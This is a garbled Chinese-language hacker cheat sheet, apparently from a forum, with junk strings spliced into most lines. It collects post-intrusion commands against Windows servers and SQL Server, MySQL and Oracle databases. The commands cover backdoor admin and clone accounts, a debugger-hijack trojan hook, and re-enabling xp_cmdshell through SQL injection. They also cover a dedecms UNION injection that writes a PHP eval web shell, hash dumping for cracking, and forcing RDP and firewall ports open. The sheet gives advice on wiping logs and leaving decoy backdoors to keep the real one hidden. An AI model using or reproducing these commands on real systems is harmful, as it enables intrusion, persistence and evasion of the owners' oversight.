: t9 \- [) ~ j; X$ m/ \+ T
1.net user administrator /passwordreq:no" v* n, @; r: v3 V& d
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
4 l: n! _# n0 O5 }2.比较巧妙的建克隆号的步骤% f: ~5 W% H7 C/ S6 P
先建一个user的用户
& A/ X4 V' K+ F' y1 p7 f. f然后导出注册表。然后在计算机管理里删掉/ U- t# H$ D: s. J# ^
在导入,在添加为管理员组% ^# N X* `8 Q, t- q, ]
3.查radmin密码0 A& Q6 E* F! \" p' _' T
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg7 {' Z! e: J+ r% ~6 l H8 R5 w Q
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]" A, m5 W4 S# g3 x" y
建立一个"services.exe"的项
7 l b$ v1 e2 I: r( D再在其下面建立(字符串值)# R# y5 `' \8 H& E7 u" U
键值为mu ma的全路径
2 Q# l$ z: c; t& }5.runas /user:guest cmd, O0 T$ n5 ?) a; x" P
测试用户权限!
3 ?8 @$ i. e! G1 _6 k4 r6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?/ _0 r. x" @" y! t
7.入侵后漏洞修补、痕迹清理,后门置放:
- b# n, O2 Y6 J/ y基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
6 L+ }% [& M( ~" T2 T/ |8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
/ ^: E+ ] j9 i) t2 K
2 b1 q2 v" j# e/ [8 U2 ufor example( L' f4 i, ~5 F5 {
+ T5 H: _9 p8 B: D( ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
N9 ]; _8 Q/ n1 O+ p( J
9 o% E; W/ @1 a, bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add') x" D: s. T3 P1 L& a9 F7 W
! l# T8 X+ O, a
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
' v6 H" k# {2 H( s+ q# i2 ^# Y如果要启用的话就必须把他加到高级用户模式- m) J$ O" A% d& A1 L# e
可以直接在注入点那里直接注入
: v; y7 V. A1 H: M* e( sid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 v- }. i' e( r/ {% a
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
8 [; ]" e9 O* W3 U* Z5 z或者' d5 f2 G0 I0 W
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
0 ?3 P; U+ n! R来恢复cmdshell。
7 B. d u/ X& z7 S: `" ] N8 H( E4 U2 ?$ Z! G" G
分析器
- c& F4 ]* e: o* Z a. p# `6 AEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
; G2 S% N8 `5 B" Q# l" U: e4 l5 _6 V然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
5 n8 T. O0 E$ G6 i10.xp_cmdshell新的恢复办法
4 ^1 S t0 @1 w7 x6 n; d8 lxp_cmdshell新的恢复办法) X/ h" ?% x$ \' h) [5 j8 s8 ~ G' I
扩展储存过程被删除以后可以有很简单的办法恢复:3 Z( Y* }; ?2 t1 \& w, R$ f
删除" L/ j/ T1 n1 r# P/ z
drop procedure sp_addextendedproc
/ k1 q6 {: ]% b% M! e6 p6 Fdrop procedure sp_oacreate
. G6 l; J; P: W5 b+ aexec sp_dropextendedproc 'xp_cmdshell'0 ^1 y3 Q$ s; G- U
) c" {: i4 X7 P
恢复
! q4 \1 y+ F$ k* V7 s3 [dbcc addextendedproc ("sp_oacreate","odsole70.dll")( k$ |# T$ `" g' E
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
$ O* F1 b0 T+ X7 y! K: ]# S7 Y+ y) P* t5 l0 }9 b- L- D& ]+ a% s
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
" q9 E$ s: R( L, s7 i
8 t) K2 X0 }$ u( }; \----------------------------- @% w! s- ?3 ~* B7 Q% q
v! z' X+ W3 D4 z3 E$ b删除扩展存储过过程xp_cmdshell的语句:
B7 R* i9 w, J; \' Sexec sp_dropextendedproc 'xp_cmdshell'# S) y* `7 R3 M9 _
. w3 b# Y. y7 [: X; Z% n7 M恢复cmdshell的sql语句
2 l, w' R) u- H0 g2 U, P3 [exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
6 K0 H p1 B% H w+ _+ D- T
8 B# U0 X* Q- J/ B( B* F* G. F6 l* m; Z9 X
开启cmdshell的sql语句: H. _, _0 b7 a
4 _. Y) k8 z7 g8 x" S
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 C: z/ X3 c. g( k) v9 M. V
; _" c# Q" p0 @4 D# t
判断存储扩展是否存在2 R6 r5 k5 `! g8 `& X8 _
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'0 |5 }8 n- S% t' H
返回结果为1就ok
# U" k% l/ Q% e4 Q- o; a7 M8 |& g! v
恢复xp_cmdshell
' C0 ~( ^9 W& M$ O# Q5 Q5 l& _7 Cexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
; z, L+ p1 c& t6 T5 g) m1 B) B6 I9 {返回结果为1就ok
7 i4 v( g8 Y& G, j5 a5 s f& C
; r2 a/ l4 z, x6 o9 b否则上传xplog7.0.dll
2 M6 r: r1 }7 P h! q) E4 g8 y5 w$ a! Xexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
: R" J3 h& [! I" o" D) P3 ~
6 `! U! |4 V0 ?0 @堵上cmdshell的sql语句0 o6 `9 |8 Y f
sp_dropextendedproc "xp_cmdshel
" U1 o e9 c6 s0 B( [1 i-------------------------; O% x2 B5 l9 |: Q5 H5 @/ E0 X
清除3389的登录记录用一条系统自带的命令:
. _* T4 t0 M* jreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
/ g2 D3 \& e; a5 u2 \/ B2 h, ?5 h* D3 k1 x7 H, d' `' J0 ?
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
' v3 y( W. u% A8 |" u在 mysql里查看当前用户的权限
7 h' f+ o: Y- A) l( vshow grants for
0 X( q4 I( S8 a8 y. B: p5 j/ e/ g K+ S: W; |. `$ _- h0 n! N- V6 d
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
9 e, d& e1 o/ t! P( o9 a3 \* [; V+ ^. g% h* q
4 \. K- E+ G4 p, c
Create USER 'itpro'@'%' IDENTIFIED BY '123';4 v1 d7 D& j% P( c c
& |0 N5 P8 P3 D# p2 ?GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
5 K" c3 a" l* h" {' v; Y
5 o r# {9 V8 H3 dMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
: S1 S1 r" |3 G+ w n/ [/ I% k' {2 h& b U
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
* j$ }3 _8 F. y6 a) f
- y9 y5 F9 h( X W% v* L3 a搞完事记得删除脚印哟。6 A- r3 m7 C$ Q7 W7 M2 {+ x
) z1 f. ]3 F! FDrop USER 'itpro'@'%';) J9 ^, I3 W+ G
2 p* a4 F: \. z9 w( E; P
Drop DATABASE IF EXISTS `itpro` ;% X/ V; M8 ~: v* G! K/ l, ]" o" x
* W7 i& d! o, A' A% u当前用户获取system权限* D5 r$ v8 I9 x
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact" m5 s0 j; x( b) G) s
sc start SuperCMD f& n A# a; F
程序代码
$ B9 m' D9 C _- N<SCRIPT LANGUAGE="VBScript">
( f/ {$ l5 d8 \& N" w/ cset wsnetwork=CreateObject("WSCRIPT.NETWORK")
# K. B0 t5 \& `6 Uos="WinNT://"&wsnetwork.ComputerName. _7 p) M. ~4 H% x$ n
Set ob=GetObject(os)
- h( v9 z+ w! V! o1 @( N" }5 oSet oe=GetObject(os&"/Administrators,group")% x2 V, {; m+ S: |% C0 {0 F8 v
Set od=ob.Create("user","nosec")7 {4 o0 v0 K/ d! S N
od.SetPassword "123456abc!@#"& v: k# ]4 n* U( ?' b: l- f
od.SetInfo0 k" ^5 r7 M6 i) j! t
Set of=GetObject(os&"/nosec",user)
) G: U9 O6 e/ H3 L# @' koe.add os&"/nosec"1 R% `8 E S" T! x/ ? |
</Script>
. P. F+ U' |( G" ^& n u* n<script language=javascript>window.close();</script>
1 K5 z# L$ P5 Y: E# W7 R- c
5 I" a0 j2 U5 o1 _% S
# e( {$ f! }: \7 N* I3 W5 F8 s; v6 o' N. r
! e. q7 g/ n, G5 ?! z) w5 k% _
突破验证码限制入后台拿shell2 P/ a$ n7 u; Q& b3 y
程序代码
1 |% [3 x$ r' b0 q* S7 e4 y/ GREGEDIT4
( k2 G1 o" C4 @: q[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] % M% ^5 y# F2 F, z
"BlockXBM"=dword:00000000 q( H; k3 o. G4 }, s. _7 A
# o5 F. ], `- c# o9 o. L; P
保存为code.reg,导入注册表,重器IE
6 k! d% P3 S" \; W( m0 @就可以了
3 ^* Q: ?. A. A1 X+ Qunion写马1 J: g3 H) V& c2 ]7 j6 a6 ~
程序代码
) `) r5 L2 ]( R, t, B! Uwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*6 b. K/ F1 |4 d
* P( O+ v; }* M" e
应用在dedecms注射漏洞上,无后台写马; k6 ]& l: m& h9 g6 r& r' Y
dedecms后台,无文件管理器,没有outfile权限的时候
. K' K) [4 }" u6 J- J在插件管理-病毒扫描里
7 P9 Q4 w9 E/ s+ L' O; t写一句话进include/config_hand.php里
& F' _2 ?6 A9 G: q l9 H# C& z程序代码, R, s$ `( }7 M
>';?><?php @eval($_POST[cmd]);?>2 G; F( r. t$ ?: ~5 W' s) T
8 Y8 t) t, L: W" |! x( W* E
/ n9 [& c0 v `, Z$ i# U" r如上格式
+ h7 q/ G" Z7 i( J# \+ z
. n8 E2 z: Q8 E. [oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解! n' p" c$ k# T/ T: E/ l
程序代码
6 ?2 k% k6 i \7 jselect username,password from dba_users;: ~8 v# Z ^+ S& o
a: P" }- p- n i% e9 N
, ?; l H2 }2 L$ a9 I8 K3 C Cmysql远程连接用户* G- ]3 J7 |' }
程序代码% y% \# u& C: A' `- s" l" K( Z
$ T B' k8 i2 c& p; Z' a
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';* y* f- }! J: ~( G8 g$ X# D: @
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
! ^( V1 \: z, p" J0 W+ d4 sMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0/ Q2 p+ E: N3 ~. r% Y% p
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
9 ^8 A) ]/ u, [$ V9 A( X" ?. H- e1 H3 R( f. Q/ c' Y, n
; V, {3 B( M r+ y0 B3 |4 M6 l: n$ l! o" u
- h: S* f- D* I* Xecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0$ f- c. _+ o* q% B
6 ?5 I3 y1 e2 X
1.查询终端端口
; n; @6 _% a- L% x3 Z( ], w# C
; b* \; _5 x, k8 i, E, {3 g* |xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
- c" N& ?4 m( `) O
7 ]5 p5 }' f7 X0 k, T6 Z J. W) g/ }/ `通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
& W0 Z0 N% q5 x; l' Vtype tsp.reg
/ J* V1 g* L! J* `* J6 H2 B% w d' y
" i) h! E% J( [# F$ v2.开启XP&2003终端服务1 z1 H7 L: q( J- i6 a+ }
& G8 D1 J( ?- B6 G
# R8 R% R7 o4 e |: T4 ZREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f( }) @" Y0 d' A
& I/ ~4 s! g( e6 r9 B6 J; N
* J" S3 H g& n( b, A
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
: i. g/ ^$ L7 \- ~/ h7 k
* B! F, w V: k/ i8 e* L1 k& d: L% X3.更改终端端口为20008(0x4E28)
: j p/ F* M4 m" K7 {0 j2 p/ ]9 e8 W- b0 J
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
- _" M8 m: Y; m |2 e5 Q
5 i8 y( M" z% I7 D1 K b2 h3 D! BREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f. \9 o, P; j, ?9 M+ t2 _( x. w
- ~ b- x: I5 T& I( C
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制; F! L" v9 }+ n/ R* z) }
0 w9 A, Y: K+ j: @, L6 s$ ^REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
6 T _& S) u) \
* i X8 Q% |7 u: t! g; E
F! I( P! q# J$ L( g" v5.开启Win2000的终端,端口为3389(需重启)
, e! v! e0 i1 e7 q" \, B: ~! `5 f1 N3 ^: }/ J$ w' o/ C( N7 I- X3 ]
echo Windows Registry Editor Version 5.00 >2000.reg . A# E& I0 S# S' l5 h9 l% u
echo. >>2000.reg
; @& k/ S9 S% @& Fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
+ n4 E5 j4 @0 f! x/ i- }echo "Enabled"="0" >>2000.reg $ ]' s- E3 |8 N. ? j3 I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg % n/ }. U) X9 V5 X/ G4 N) N
echo "ShutdownWithoutLogon"="0" >>2000.reg
7 r- x* E- n- r8 _7 K/ n. Eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
2 x" |' o' N6 \' c4 xecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
$ w! m8 p$ M& B$ Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg : o6 v* M/ K: r; k
echo "TSEnabled"=dword:00000001 >>2000.reg * r7 f6 q& h B" D! P; s M4 R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ( K/ C1 F* b% N+ }
echo "Start"=dword:00000002 >>2000.reg
8 x x( C) Z7 \% D; d- Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
1 z- j- F. E9 r/ necho "Start"=dword:00000002 >>2000.reg * A ]% k& x! d$ q( p
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 1 J n9 @1 `6 t6 ]( a8 y4 g
echo "Hotkey"="1" >>2000.reg 8 r$ i; ~0 N+ t5 a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg + X6 `. x! D: K& k& K
echo "ortNumber"=dword:00000D3D >>2000.reg
7 i0 M; h0 _' ^3 i' }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
. u8 g" k! N! Gecho "ortNumber"=dword:00000D3D >>2000.reg7 e1 G' @ X* D
5 a# s( V) s7 ?6 [6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)3 X0 u3 v' o( y5 {$ x( g
c* |6 H: q9 _0 y7 q2 a. Z@ECHO OFF & cd/d %temp% & echo [version] > restart.inf' N( d' K/ H" ]
(set inf=InstallHinfSection DefaultInstall)2 [$ f4 g# k* G, W
echo signature=$chicago$ >> restart.inf) q [( k8 L2 I$ h" G) i
echo [defaultinstall] >> restart.inf9 G. A1 M9 \: I" e* y
rundll32 setupapi,%inf% 1 %temp%\restart.inf* w; _) E' k, L! p' U3 Y9 T8 e; |
- X+ a$ f' l0 |6 Q6 l" `% Q
4 z6 J4 |/ F1 h5 D6 }7.禁用TCP/IP端口筛选 (需重启)
0 e2 g# |4 D% D$ @- W8 t: E3 [
: m3 K' n8 G/ h0 p2 L. c; i" kREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f7 @, w3 }1 L3 a V9 Q* x
- B+ c0 C! @3 Y6 g% ?8.终端超出最大连接数时可用下面的命令来连接
" Y6 Q% l8 I7 l* V1 f) L( Q/ P' I3 D8 @/ X, ]. I# G2 J
mstsc /v:ip:3389 /console
# \( p5 s& M- V: \2 B+ J
# W" ~% c4 z* c/ Y5 d L6 P B9.调整NTFS分区权限
! _; Z8 O6 O3 [5 e# Q( i9 z1 R
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)# q4 r/ {, R1 S! r$ o/ S% }
8 O. I) W+ i5 h2 X& R$ C
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)* F3 ?% B0 J) Y. E8 e
( L6 y" Z! `& I( K9 D1 M2 u. ~; N
------------------------------------------------------7 w7 e- [% Z0 a8 h
3389.vbs * w( c6 g% m+ D. V, r) W2 y
On Error Resume Next$ h4 s' Y" M+ U$ u
const HKEY_LOCAL_MACHINE = &H80000002
" e7 }) T6 h1 n) n V" i% U6 {strComputer = ".", J1 I2 P) m( W+ T2 ^4 c
Set StdOut = WScript.StdOut$ {2 r- R, j/ C6 k
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_$ g, \+ l2 q; m- c9 ?! f
strComputer & "\root\default:StdRegProv"). a4 }; O0 m5 I
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"6 k R: H/ y4 P, R( @ ~
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
$ v- q! t7 g/ f6 v6 e- G' E# O2 HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
. W' c4 F7 ^' y( |. N6 C. Horeg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
/ R3 n8 t5 \+ c3 SstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"* u; [" A- ^( w- G- ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
* V6 P7 z* p: GstrValueName = "fDenyTSConnections"
" X& T' H' Y+ ^dwValue = 0" F" D! x N" l% n
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. D2 y/ M& e1 U A) RstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
9 W, T* }2 x5 estrValueName = "ortNumber"7 [* H. m% ]; ` \4 J9 I3 u
dwValue = 3389
7 T3 [; |9 @) F7 H7 T; d' }oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue; G5 b+ m, U. Q, i1 }' C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"5 ^, g. V* [; {! O
strValueName = "ortNumber"% E. k" t) p/ g- r8 ` ~( {2 k
dwValue = 3389
1 l3 b! s5 k, Z- j- zoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! A0 L( A" @/ ySet R = CreateObject("WScript.Shell")
* h6 T6 z3 K/ w' ^; ~% `! sR.run("Shutdown.exe -f -r -t 0")
9 R1 d; M6 `* W9 L# |
% _ q0 t8 I* L; I删除awgina.dll的注册表键值6 p+ d! i9 g& A* s3 }8 O/ T4 x
程序代码
: }( U. U( U' ], H+ O, ]. n1 M; h* j/ C7 A0 o) J% R. d7 ~. `+ S
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
% [: n! e0 K) ?. H% s6 \& s C! _& e6 D
- n7 R- g' m+ u2 G9 D Z$ K
, S( P. H9 `9 K/ c5 N( z% W1 _, t) W
7 j* ]% M, L0 H- y4 X& p程序代码
4 _9 `3 R: ?1 H: }# a- i5 F3 E3 FHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash' t0 ~" }. Q; n$ p! V: {
- ~ Y. j/ J8 g0 U$ m# e! ?
设置为1,关闭LM Hash
& Y) U, y4 L( G; |; S, c
- S1 P0 [8 `' c8 }; g' F数据库安全:入侵Oracle数据库常用操作命令9 g5 N7 N3 y; _% v, @' x6 A6 T! \
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
3 O$ W8 n1 p+ Y* F1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
8 H3 I! ^) p9 \) u, \/ P- K2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;* k! o# p( J; [* l0 i
3、SQL>connect / as sysdba ;(as sysoper)或
# [) Q- D' L- T+ i9 q1 pconnect internal/oracle AS SYSDBA ;(scott/tiger)
: v( M0 F) l3 F" E; ^conn sys/change_on_install as sysdba;3 U" C8 T/ u2 l
4、SQL>startup; 启动数据库实例
9 ~- J$ Q5 F# c$ E- [, C6 }* |( H5、查看当前的所有数据库: select * from v$database;
" r$ C' N5 ^+ Y' {# c5 ^! Mselect name from v$database;) E- J1 Q' D6 m W. F
6、desc v$databases; 查看数据库结构字段: G' L ~# w. n' i. y0 ] G+ o
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:; r5 s/ f3 J: n0 T
SQL>select * from V_$PWFILE_USERS;
, W( `2 V0 F+ w. M) F" OShow user;查看当前数据库连接用户$ m2 W' _9 l" ]7 d4 H( l
8、进入test数据库:database test;
9 l$ o/ I2 K7 N7 P0 B) D/ C2 E9、查看所有的数据库实例:select * from v$instance;3 i4 {- x* q3 @- w- d
如:ora9i* z. K$ i% q, ?0 L, X# ?
10、查看当前库的所有数据表:
+ P) N3 O3 M) }4 M% V. R+ HSQL> select TABLE_NAME from all_tables; \) o2 N. i) B9 a( r9 g
select * from all_tables;
& s1 @6 ^7 S' `0 WSQL> select table_name from all_tables where table_name like '%u%';
% ~ I7 D& y `; Y$ tTABLE_NAME
+ I9 j6 N+ Z: ]: n+ o$ E8 F9 \------------------------------3 D/ ]5 w/ V* |( R) b. }6 h
_default_auditing_options_
" v# Z- j+ X9 v11、查看表结构:desc all_tables;
6 w; ~, g! M- l4 i4 P12、显示CQI.T_BBS_XUSER的所有字段结构:, z8 E$ K; a- a4 r# ~# Z8 z
desc CQI.T_BBS_XUSER;3 n4 M: h$ Y8 p+ d8 f0 T, |
13、获得CQI.T_BBS_XUSER表中的记录:
9 L4 O1 H9 y' J/ Q- ?6 A) D/ L6 V! dselect * from CQI.T_BBS_XUSER;
# F) ?% q% g" }9 @4 E6 s% h4 _4 C1 X14、增加数据库用户:(test11/test)( N3 p3 g3 A0 F9 O. r$ l. Q
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;& Q- Q' X) h* W& q, n! l1 }
15、用户授权:
; r6 e3 ]8 ?8 N- e9 Ogrant connect,resource,dba to test11;/ Y8 G4 a- x( P' A
grant sysdba to test11;& O* b( B- f1 O, F7 s6 g
commit;; J; P3 `- l' f }+ a8 T
16、更改数据库用户的密码:(将sys与system的密码改为test.)
- P$ L/ n% H4 b2 Lalter user sys indentified by test;( R# ^' u* |. X/ r+ T
alter user system indentified by test;
2 H8 p& k. V! U8 ^! W; m: s; R* S; H( q
applicationContext-util.xml7 c. E4 ?% |" w: E5 [8 U) }
applicationContext.xml
& C$ I. o+ g2 q# T; O8 X0 n+ x. ustruts-config.xml
. e2 X/ Z+ `* S' Y zweb.xml* m, m# G, z/ _4 c3 U& a* e
server.xml
4 w$ r% \# M! C, n; mtomcat-users.xml$ R- O: Y% T5 ?2 e5 _2 L* d
hibernate.cfg.xml
0 c8 T) ^, g: d8 m4 C @/ A) Wdatabase_pool_config.xml
8 B8 I3 R6 i; v3 i8 e" s
% A c6 \0 G, \. T7 x1 f/ @+ n3 F) Z
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置' R9 j# d2 x2 `- ]6 e; H
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
* K8 f$ E9 O4 ~$ C, E: T\WEB-INF\struts-config.xml 文件目录结构
* r! w0 \* _& Y9 x9 L
! l- x8 h# |. {$ x# @- ~spring.properties 里边包含hibernate.cfg.xml的名称
+ U" a! F' W+ v( H8 v
2 W; W. s6 l- T8 I- }& W p+ U/ _3 x- C. ~ f$ t; u/ z3 l
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml' m6 c. S x a& j$ M
! S) C1 p. \4 l
如果都找不到 那就看看class文件吧。。
S$ z: O' T" x! Q+ d& B; N
* `* p; Q: }6 ]9 Q, H S9 n测试1:
9 M8 X4 w4 N) V) ~5 c" pSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
* l/ S- A! G3 I4 V* \6 V) E
* O7 a1 \5 Z {+ Z, W. u/ p测试2:! n1 g2 ~$ l! y0 N) ^
6 z* K3 z1 A9 q& @' gcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
/ J8 O' f9 V4 H2 h) w+ u
7 X, d# l. Z: |, _delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
$ c/ O( ?; J$ C, h+ I* z+ y- }# a) }* `/ b
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
Z1 l* w1 x H% m5 T3 T( Y' P; e. i
+ \, I% y7 H% A2 @查看虚拟机中的共享文件:
0 ]1 B+ p; \8 A9 }9 {在虚拟机中的cmd中执行2 W: x# @; c8 N2 D
\\.host\Shared Folders# L# O6 _* ~* S; s- ^* `) k
7 J& e2 I8 l: }* hcmdshell下找终端的技巧/ N$ ^3 a2 Y* r- t! f- r# ^
找终端:
# j/ \, x3 L2 b- V7 u第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! , B! L' n% @+ O1 \$ t; A% T
而终端所对应的服务名为:TermService 4 `- [; Q+ w5 ]/ q8 h
第二步:用netstat -ano命令,列出所有端口对应的PID值!
& X. G' g1 }3 \; T( o 找到PID值所对应的端口
* u( A! a$ d7 H. p" s* E1 o2 x
1 S4 Q8 }7 y# {' J+ F0 G: l, N查询sql server 2005中的密码hash
: X: g! V; I+ h2 Y/ m: x2 sSELECT password_hash FROM sys.sql_logins where name='sa'
/ n* v. h& V8 v7 q3 z* x5 zSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
1 E9 m, Y z) B& V9 yaccess中导出shell6 D! b q0 C/ s; x
$ P5 d' N/ m( i2 k( ^
中文版本操作系统中针对mysql添加用户完整代码:, f0 @9 C5 y% q F0 }- h
$ z4 }: p. P7 ?' F( X- y, r/ L
use test;; @' _ W1 W8 n2 n. @. W7 X
